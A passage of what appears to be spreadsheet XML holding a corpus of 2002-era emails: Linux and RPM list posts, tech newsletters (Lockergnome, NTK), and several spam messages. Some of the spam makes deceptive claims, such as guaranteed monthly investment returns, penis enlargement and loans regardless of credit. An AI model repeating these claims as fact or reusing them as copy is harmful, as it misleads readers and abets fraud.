 be better, as well as perhaps adding a note in %description.
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Luggage falls from plane onto Salvation Army scattering used
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8293089,1717/
 Date: 2002-09-26T23:40:19+01:00
 [IMG: http://www.newsisfree.com/Images/fark/abcnews.gif ([ABC News])]
</t>
  </si>
  <si>
    <t xml:space="preserve">CDale wrote:
 &gt; 
 &gt; I was wondering if anyone knows of an alternative that allows
 &gt; all the bells and whistles that yahoo has, such as reminders,
 &gt; file storage, calendars, etc.
 SmartGroups, I think.
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Not Surprised
</t>
  </si>
  <si>
    <t xml:space="preserve">
 It took me a week to get down to this;
 The towering pine and the hemlock.&lt;p&gt;
 &lt;a href=http://www.informationweek.com/story/IWK20020723S0005&gt;http://www.informationweek.com/story/IWK20020723S0005
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Product Announcement
</t>
  </si>
  <si>
    <t xml:space="preserve">NEW PRODUCT ANNOUNCEMENT
 From: OUTSOURCE ENG.&amp; MFG. INC.
 Sir/Madam;
 This note is to inform you of new watchdog board technology for maintaining
 continuous unattended operation of PC/Servers etc. that we have released for
 distribution.
 We are proud to announce Watchdog Control Center featuring MAM (Multiple
 Applications Monitor) capability.
 The key feature of this application enables you to monitor as many
 applications as you
 have resident on any computer as well as the operating system for
 continuous unattended operation.  The Watchdog Control Center featuring
 MAM capability expands third party application "control" of a Watchdog as
 access to the application's
 source code is no longer needed.
 Here is how it all works:
 Upon installation of the application and Watchdog, the user may select
 many configuration options, based on their model of Watchdog, to fit their
 operational needs.  If the MAM feature is enabled, the user may select any
 executable program that they wish for monitoring.
 A lock up of the operating system or if any one of the selected
 applications is not running, the MAM feature, in
 conjunction with the Watchdog, will reset the system allowing for
 continuous operation.
 It's that simple!
 Watchdog Control Center is supported on most Microsoft Windows platforms
 (Win9x/WinNT/Win2k) and includes a Linux version for PCI Programmable
 Watchdogs.
 Watchdog Control Center Features:
 - Automated installation
 - Controls all Outsource Engineering Watchdogs
 - User selectable Watchdog timeout period
 - User selectable Watchdog stroke interval
 - Multiple Application Monitoring
 Included on the Installation CD:
 - Watchdog Control Center
 - Watchdog Drivers
 - Documentation
 For more information, please visit out website at
 http://www.outsrc-em.com/ or send an e-mail to sales@outsrc-em.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Easy 30-50% Return and here's how..... 4674ewSq2-759CS-14
</t>
  </si>
  <si>
    <t xml:space="preserve">Easy 30-50% Return?
 Learn how you can receive a monthly check for 3, 4, or 5%
 a month until your initial investment is paid off...then a
 monthly check for over 4% a month for years to come...
 We know it sounds impossible, but it's happening today.
 For complete information on this 
 multi-trillion dollar industry:
 http://www.page4life.org/users/stone40/
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 To Opt Out:
 Please go to our "OPT OUT" website:
 http://www.page4life.org/users/stone40/optout.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Doctor Approved Pill                 LGW
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;FONT SIZE=3D"4"&gt;&lt;B&gt; A man endowed with a 7-8" hammer is simply&lt;br&gt;
  better equipped than a man with a 5-6"hammer. &lt;BR&gt;
 &lt;BR&gt;Would you rather have&lt;br&gt;more than enough to get the job done or fall =
 short. It's totally up&lt;br&gt;to you. Our Methods are guaranteed to increase y=
 our size by 1-3"&lt;br&gt; &lt;A HREF=3D"http://209.163.187.47/cgi-bin/index.php?10=
 004"&gt;Come in here and see how&lt;/A&gt;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</si>
  <si>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America's Most Liberal Lenders                                                        0137Cpnx4-448G-13
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;STYLE&gt;
 BODY {font-family="Arial"}
 TT {font-family="Courier New"}
 BLOCKQUOTE.CITE {margin:0; padding-left:0.5em; border-left:2px solid;}
 SPAN.TABOOHEADER {display=none}
 &lt;/STYLE&gt;
 &lt;title&gt;Online Loan Service&lt;/title&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;p align="left"&gt;
 &lt;FONT FACE=arial,helvetica&gt;&lt;B&gt;&lt;FONT  COLOR="#d6321b" SIZE=5 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;
 What Are You Waiting For?&lt;br&gt;
 &lt;/FONT&gt; &lt;/B&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font size="5" color="#0000FF"&gt;Rates Have Dipped....Approvals Are Up!&lt;/font&gt;&lt;/b&gt;&lt;FONT FACE=arial,helvetica&gt;&lt;B&gt;&lt;font 
 size="5" FAMILY="SANSSERIF" FACE="Arial" LANG="0" color="#0000FF"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/B&gt;&lt;/font&gt;&lt;font size="2" color="#FFFFFF"&gt;&lt;b&gt;7&lt;/b&gt;&lt;/font&gt;&lt;span 
 style="background-color: #FFFFFF"&gt;&lt;br&gt;
 Now you can shop for your home loan and get the best deal possible &lt;br&gt;
 through &lt;font color="#000080"&gt;our
 &lt;a href="http://www.mort102.com/loanquote/loanquote.html?subject=12EasyQuote"&gt; &lt;b&gt;
 Online Home Loan Service&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;a 
 href="http://www.mort102.com/loanquote/loanquote.html?subject=12EasyQuote"&gt;.&lt;/a&gt; &lt;b&gt;&lt;font color="#D6321B"&gt;&lt;i&gt;Free with 
 no obligation!&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;Act Now! This is the time to take advantage of falling interest 
 rates.&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;Regardless of your 
 credit or income level, money is available for any situation. &lt;br&gt;
 We are working with many lenders who will offer you the best deal possible for
 &lt;br&gt;
 a home loan based on your situation. &lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;Refinance to a lower 
 rate and payment with or without cash in your pocket.&lt;br&gt;
 Second Mortgage or an Equity Line to pay off bills, improve your &lt;br&gt;
 home or just get some cash for what ever purpose you like.&lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;We have eliminated the 
 hassle of shopping for a loan. &lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;It's simple an fast!&lt;b&gt;
 &lt;/b&gt;Just complete our &lt;b&gt;
 &lt;a href="http://www.mort102.com/loanquote/loanquote.html?subject=12EasyQuote"&gt;2 minute form&lt;/a&gt;&lt;/b&gt; which provides the data base&lt;br&gt;
 with the information needed to evaluate your situation and get you a free loan 
 quotation.&lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;We don't pull your 
 credit or ask for your social security number.&lt;i&gt;&lt;b&gt;&lt;font color="#D6321B"&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font color="#D6321B"&gt;It is that easy!&lt;/font&gt;&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font color="#0000FF"&gt;&lt;font color="#000000"&gt;
 &lt;a href="http://www.mort102.com/loanquote/loanquote.html?subject=7MortgageRequest" 
 style="text-decoration: none"&gt;&lt;span style="background-color: #FFFFFF"&gt;
 &lt;font color="#000000"&gt;Just&lt;/font&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/font&gt;
 &lt;span style="background-color: #FFFFFF"&gt;&lt;a style="text-decoration: none" 
 href="http://www.mort102.com/loanquote/loanquote.html?subject=12EasyQuote"&gt;
 &lt;b&gt;CLICK HERE&lt;font color="#000000"&gt; &lt;/font&gt;&lt;/b&gt;&lt;font color="#000000"&gt;and watch 
 the lenders compete for your business. You are in charge!&lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;
 &lt;FONT FACE=arial,helvetica&gt;&lt;FONT  COLOR="#000080" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;We apologize for any email you may have inadvertently received.
 Please&lt;/FONT&gt;&lt;FONT  COLOR="#000000" style="BACKGROUND-COLOR: #ffffff" SIZE=2 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;
 &lt;a href="http://www.mort102.com/loanquote/remove.html"&gt;CLICK HERE&lt;/a&gt; &lt;/FONT&gt;
 &lt;FONT  COLOR="#000080" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;to opt out from future newsletters&lt;/FONT&gt;&lt;FONT  COLOR="#000000" style="BACKGROUND-COLOR: #ffffff" SIZE=2 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;.&lt;/FONT&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;
 &lt;FONT size="2" FACE="arial,helvetica"&gt;&lt;span style="background-color: #FFFFFF"&gt;&lt;FONT  COLOR="#000000" style="BACKGROUND-COLOR: #ffffff" SIZE=2 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;
 9455qyBX6-240Yxfy9620HnbI4-618JPZu7866ZfVB3-590sOHD5982LDnl55&lt;/FONT&gt;&lt;/span&gt;&lt;/font&gt;&lt;/HTML&gt;&lt;/p&gt;
 &lt;/body&gt;&lt;/html&gt;
 2163euDu5-512jPdy6605FwVf4-771cAuR6578vpMg9-113Zl45
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Did you complete this?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"6" color=3D"#FF0000"&gt;
 &lt;a href=3D"http://www.justaclick-supersite.com/cl5/"&gt;&lt;font color=3D"#FF000=
 0"&gt;FREE SERVICE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font face=3D"Arial" size=3D"4"&gt;&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4"&gt;&lt;br&gt;
 &lt;font color=3D"#800000"&gt;Mortgage rates have NEVER been lower.&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;font color=3D"#800080"&gt;Is your credit good? Get a loan beyond your=
  wildest 
 expectations! &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4" color=3D"#800000"&gt;
 &lt;a href=3D"http://www.justaclick-supersite.com/cl5/"&gt;CLICK &lt;font color=3D"=
 #FF0000"&gt;HERE&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;font face=3D"Arial" size=3D"4" color=3D"#800080"&gt;Your credit stink=
 s? Lenders 
 will still give you an absolutely amazing loan. &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"4"&gt;&lt;font color=3D"#800000"&gt;
 &lt;a href=3D"http://www.justaclick-supersite.com/cl5/"&gt;CLICK &lt;font color=3D"=
 #FF0000"&gt;HERE&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;font color=3D"#800080"&gt;Just click here and get started.&lt;/font&gt;&lt;fon=
 t color=3D"#800000"&gt;&lt;br&gt;
 &lt;br&gt;
 Absolutely FREE Quote.&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;font color=3D"#800080"&gt;&lt;a href=3D"http://www.justaclick-supersite.=
 com/cl5/"&gt;CLICK
 &lt;font color=3D"#FF0000"&gt;HERE&lt;/font&gt;&lt;/a&gt; for quick details!&lt;/font&gt;&lt;/font&gt;&lt;/=
 b&gt;&lt;font color=3D"#800000"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020719.html"&gt;
       http://www.lockergnome.com/issues/daily/20020719.html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&lt;/style&gt;&lt;title&gt;20020719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07.19.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;WE NEED YOU TO BE AT GNOMEDEX!&lt;/b&gt; That's what your employer should be telling you. Microsoft Pocket PC experts will be sharing tips on improving workplace productivity with portable devices. Combined with Proxim's on location wireless networking solutions, a Pocket PC can keep you and your co-workers communicating no matter where you are in the building. Learn how to bring Wi-FI and PDA technologies together for the ultimate in portable computing. &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I had just finished giving &lt;a href="http://ben.franske.com/"&gt;Ben&lt;/a&gt; and his sister a "behind
 the scenes" look at our set, when Patrick walked in and poked me
 in the left arm repeatedly with his index finger - until I hung up
 the phone and gave him my full, undivided attention. "Did you know
 that your GnomeTomes are being featured in the 'Barnes &amp; Noble'
 eBooks section," he asked. Well, that was news to me. After
 flailing over to his workstation and flipping through a few pages,
 we ultimately realized that he had discovered the entry on the
 main page for &lt;a href="http://www.amazon.com/exec/obidos/redirect?tag=lockergnomedigit&amp;path=tg/browse/-/551440/"&gt;Amazon's
 eBooks&lt;/a&gt;. Cool! "With a name that inspires curiosity and sparks the imagination,
 Lockergnome represents one of the latest and most popular
 additions to our e-documents catalog. At prices starting under $3,
 these eminently useful titles from one of the most fanciful-sounding
 publishers we've encountered are hard to resist." Thank
 you for helping us along, gang. My ultimate goal is to kick that
 Godin guy out of the top ten - if only for a day.
 &lt;p&gt;
 &lt;table align="left" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="6" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;PC World Picks&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,6477,00.asp"&gt;Remove Plus! 2002&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,8087,00.asp"&gt;Ashampoo UnInstaller&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,5046,00.asp"&gt;Norton Uninstall Dlx&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,8092,00.asp"&gt;Perfect Companion&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,7921,00.asp"&gt;Uninstall Manager&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,17624,00.asp"&gt;Remove 4Good&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,21860,00.asp"&gt;Eraser 2000&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 I must now thank both Lockergnomie Dan Reain and Nancy Workman-Luter
 (both from Sonic Foundry) for donating a couple more prizes
 for this year's &lt;a href="http://www.gnomedex.com/"&gt;Gnomedex
 conference&lt;/a&gt;. Just by walking through the entrance with your
 pass in hand, you'll be automatically entered to win one of the
 copies of Sound Forge XP! And this software is no slouch; for home
 users and professionals on a Windows OS, it's one of the best
 audio editors around. If it can't do something you need to have
 done, then I bet it can't be done at all. Expect a full
 Lockergnome review from our Digital Media editor (Jake) at some
 point in the future. Until then, feel free to
 &lt;a href="http://www.sonicfoundry.com/download/step2.asp?DID=257"&gt;download
 the demo&lt;/a&gt;. If I can ever decide on a digital video camera,
 perhaps their Vegas Video will sit on my system, too. Melanie and
 I were talking about hardware options the other day. She's leaning
 towards a Canon, too. Unless I hear or see otherwise, the ZR45MC
 is at the top of my list. Still and low-light images aren't the
 best, but I'm not really up for spending much more than $1000.
 Neither is Gretchen, oddly enough.
 &lt;P&gt;
 As much as I dislike the AOL client user interface, I gotta admit:
 it's pretty darn powerful underneath. For instance, you can
 "unsend" an e-mail message (but only if it was sent to another
 America Online member and s/he hasn't read it yet). If you travel
 often, the service is a bargain. If you know someone who just
 needs the Internet basics, it's perfect. One caveat: the software
 puts RealPlayer on your system without asking you first. I was a
 little upset when I discovered its icon sitting in my Start Menu.
 Nowhere during the installation process did I see a way to opt out
 of it. I'm not surprised; there are more advertisements on AOL
 than there are from your average "free" Web page host. You may
 have asked yourself: "What is Chris doing installing AOL in the
 first place?!" I don't &lt;a href="http://www.iblameyou.com/"&gt;blame
 you&lt;/a&gt;. No, hell did not freeze over. We've been doing tips for
 their users on our show lately, and I decided to throw it on my
 laptop for testing purposes. Perhaps 8.0 will be better?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&lt;b&gt;SEPopular v1.02 [2.4M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a href="http://www.monocle-solutions.com/sepopular/sepopular.shtml" class="URL"&gt;http://www.monocle-solutions.com/sepopular/sepopular.shtml&lt;/a&gt;
 &lt;p&gt;
 {Popularity contest} I never considered myself to be part of the popular crowd. But how do you really know if others consider you to be popular? Well, if you are talking about the popularity of your website (although the junior high kids are more concerned about the labels on your clothes), then all you have to do is download SEPopular. Search engines (such as Google) rank your site by determining how many people link to your site (the more people who link to your site, the better your ranking). With this investigative tool, you can see how many links to your website there are (from the perspective of five major search engines). You don't just have to check out your own website, though... all you have to do is enter the URL of a website, and out comes the TRUTH about its popularity. Another nice feature of this software is that you can import web addresses from a .txt file so that you don't have to enter each one individually. It's all about keeping up with thejoneses.com.
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;MB-Ruler v0.93 [441k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a href="http://www.markus-bader.de/MB-Ruler/" class="URL"&gt;http://www.markus-bader.de/MB-Ruler/&lt;/a&gt;
 &lt;p&gt;
 {Measure distance and angles} I was never very good in geometry... Pythagoras would be disappointed that I can never exactly remember his theorem. (What did a hippopotamus have to do with triangles anyway? That animal seems to be pretty round if you ask me...) Anyway, MB-Ruler is quite a useful little application, especially for anyone who has had to work with banners and graphics for the Web. You can measure angles in radians or degrees, and distances in inches, centimeters, twips, points or pixels. And if those weren't enough options, you can even set your own scale. Everything about MB-Ruler can be customized, including its size and color. Talk about an application that "measures up!"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Outlook 2002, without a server!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;!-- SYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Your Outlook Express Password Is Not Retained&lt;/b&gt;
 &lt;p&gt;
 &lt;a href="http://support.microsoft.com/default.aspx?scid=kb;en-us;Q264672" class="URL"&gt;http://support.microsoft.com/default.aspx?scid=kb;en-us;Q264672&lt;/a&gt;
 &lt;p&gt;
 {Fixing password problems} Now where did I put that password? I thought I had Outlook Express keeping track of it for me... If you use Outlook Express (for Windows 2000 or Windows XP) to check your e-mail, then this article is for you. Occasionally your password for Outlook Express is not retained, even though you have checked the "Remember Password" checkbox. To fix this particular issue, you will need Administrator privileges in order to make some modifications to your system's registry. The article contains steps for backing up your registry and, since you can cause a lot of accidental damage while tweaking the registry... I would recommend that you follow them.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&lt;b&gt;Screen Mate Builder v1.0b [927k] W9x/2k/XP US$29&lt;/b&gt;
 &lt;br&gt;    Unearthed by Duo Yi
 &lt;p&gt;
 &lt;a href="http://www.screenmate.net/" class="URL"&gt;http://www.screenmate.net/&lt;/a&gt;
 &lt;p&gt;
 {Animated desktop pal} Bored with your PC's desktop? All it does is sit there and stare at you, never saying a word. It sounds like you need a little something to pump some life into that desktop! With Screen Mate Builder, you can make your very own animated screen mate from any animated GIF file. On top of that, you can add background music (MIDI files) and sound clips (WAV files) to your new desktop chum. Share your creation with friends and family: trust me, it's better that they know, and don't think you just have an imaginary friend. No programming experience required - just step through the wizard and out pops your very own screen mate. Can't beat those instant buddies!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 class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeSTORE. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Re-route E-mail Forwarding Service&lt;/b&gt;
 &lt;p&gt;
 &lt;a href="http://www.re-route.com/" class="URL"&gt;http://www.re-route.com/&lt;/a&gt;
 &lt;p&gt;
 Soon, it will be time for us to fill out the change of address cards as we relocate to a different area of the city. You probably knew that your snail mail could be forwarded, but what about your e-mail? Back in the days of college e-mail accounts, every time I changed ISPs I had to send a mass e-mail to my contacts and hope they saved my new address, otherwise I could miss out on getting their correspondence. The great thing about Re-Route's service is that I don't have to worry about lost e-mails after changing ISPs. Sign up for the service, and they will take any e-mail sent to your old account and forward it to your new e-mail address. After that, Re-Route e-mails the sender to notify them of your new address. If you are with AOL, MSN, or any of their featured partners, then the first month is free. If not, then Re-Route charges a very nominal fee of ten bucks for the one month and twenty-five bucks for 3 months. Have someone else handle all my changing e-mail address need!
 s? Sounds like money well spent!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Just because it is summer and bright out doesn't mean that you should stop using your flash on your digital camera. Bright sunlight creates harsh shadows that may cause you to lose detail. Don't you hate those pictures where you can only see half of someone's face because the other half is black from a shadow? Well, the cure is in front of you... use your flash during the daytime to throw a little light into those shadows. Some cameras allow you to adjust how much flash is used, also known as flash exposure compensation. If you can adjust the output of your flash, then try it at the lowest setting first. Remember, you don't want to completely get rid of the shadows because they add depth to your photo. Keep increasing your flash output until you get your desired results. Also, as an extra tip, don't forget that you can conserve battery life on your digital camera by turning on the autofocus option and turning off the LCD display.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href="http://www.lockergnome.com/issues/daily/20020719.html"&gt;http://www.lockergnome.com/issues/daily/20020719.html&lt;/a&gt;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Entrance Slouch --&gt;
 The way to kill competition is to create something too good for competition
 to imitate.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] FAT undelete on linux ?
</t>
  </si>
  <si>
    <t xml:space="preserve"> Has anyone used (successfully!) a fat undelete program on Linux ?
  Something like a simple version of the norton disk tools would be fine.
 Actually, most likely the MS DOS "undelete" program would do...
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Project Battuta: Geospatial data in the field
</t>
  </si>
  <si>
    <t xml:space="preserve">Interesting project involving geospatial data for mostly governmental uses.
 They have a deep understanding of geospatial data needs for several
 government agencies. The project infrastructure is centralized, and has been
 used in the field on several projects.
 http://dg.statlab.iastate.edu/dg/research/
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MiniNTK 2002-08-16
</t>
  </si>
  <si>
    <t xml:space="preserve"> __  __ _2002-08-16   _ _____ _  __
 |  \/  (_)_ __ (_) \ | |_   _| |/ /    o Join! mail an empty message to
 | |\/| | | '_ \| |  \| | | | | ' /     o ntknow-subscribe@lists.ntk.net
 | |  | | | | | | | |\  | | | | . \     o Website (+ archive) lives at:
 |_|  |_|_|_| |_|_|_| \_| |_| |_|\_\    o      http://www.ntk.net/
                                 &gt;&gt; MINI NEWS &lt;&lt;
                                time for a snooze
          There comes a time in every August when news services should
          just shut the hell up, because the weather's too hot or too
          underwater, and the world grows so dull and hazy that even
          the overexcitable hardcore at LinuxWorld wander around like
          it's Undead Expo 2002, and the Weiss-baked Macintoxins can
          barely lift their wallets for MacOS X.2, and Sun can't be
          bothered to do anything but run s/RedHat/Sun Linux/g on a
          free distribution disk, and everyone else is on holiday, or
          getting ready to be on holiday, or being told that perhaps
          they should take a holiday RIGHT NOW, and all we can do is
          look at this awful, awful EUCD legislation and stare out the
          window until dawn.
          Yeah, it's our annual no news edition. We moved to a faster
          server. Do take the rest of the weekend off in celebration.
          Or, alternatively, build up a head of overexcitement for
          the public appearance of THOMAS DOLBY - the "Hyperactive"
          chart artist and Beatnik audio plug-in advocate who, even as
          you read this, appears to be hosting a 350 Euro-per-head
          seminar on COMPOSING POLYPHONIC RING TONES at Helsinki's
          Radisson Royal Hotel in Finland. Lucky delegates will learn
          about "using real-time MIDI controllers for tweaked
          effects", "techniques for making little speakers sound huge"
          and - perhaps most distressingly - "picking the right
          instrument and register for best audibility". The
          cacophonous cavalcade comes to London's Soho House on Tue
          and Wed next week if you'd like to check it out for
          yourself - or perhaps hold a street protest on behalf of
          music lovers worldwide.
          http://www.headspace.com/seminar2002.htm
            - So they're better than monophonic ringtones. What isn't?
                                 &gt;&gt; ANTI-NEWS &lt;&lt;
                              berating the obvious
          because there are still a few PUERILE GOOGLE MISSPELLINGS
          that NTK doesn't come top of the search results for - yet:
          http://www.google.com/search?q=partnershit&amp;start=10 , "anals
          of history", "blackpoo", "farternity", "proffesional" - the
          latter particularly in conjunction with "proofreading":
          http://www.google.com/search?q=proffesional+proofreading ...
          "Subie" called "ya ,jhg hjg yjg" by unashamedly Glaswegian
          DAILY RECORD: http://www.ntk.net/2002/08/16/dohsub.gif ...
          looks like his official title now becomes "President Buh":
          http://www.ntk.net/2002/08/16/dohbuh.gif ... frickin' MAC
          users buy anything: http://www.ntk.net/2002/08/09/dohsx.gif
          ... maybe not the best month for this branch of the W3C:
          http://lists.w3.org/Archives/Public/www-forms-editor/2002Mar/ ...
                                &gt;&gt; EVENT QUEUE &lt;&lt;
                          goto's considered non-harmful
          Boasting technical seminars, interplay of technological ideas
          and, of course, beer, this year's LINUXBIERWANDERUNG (from Sat
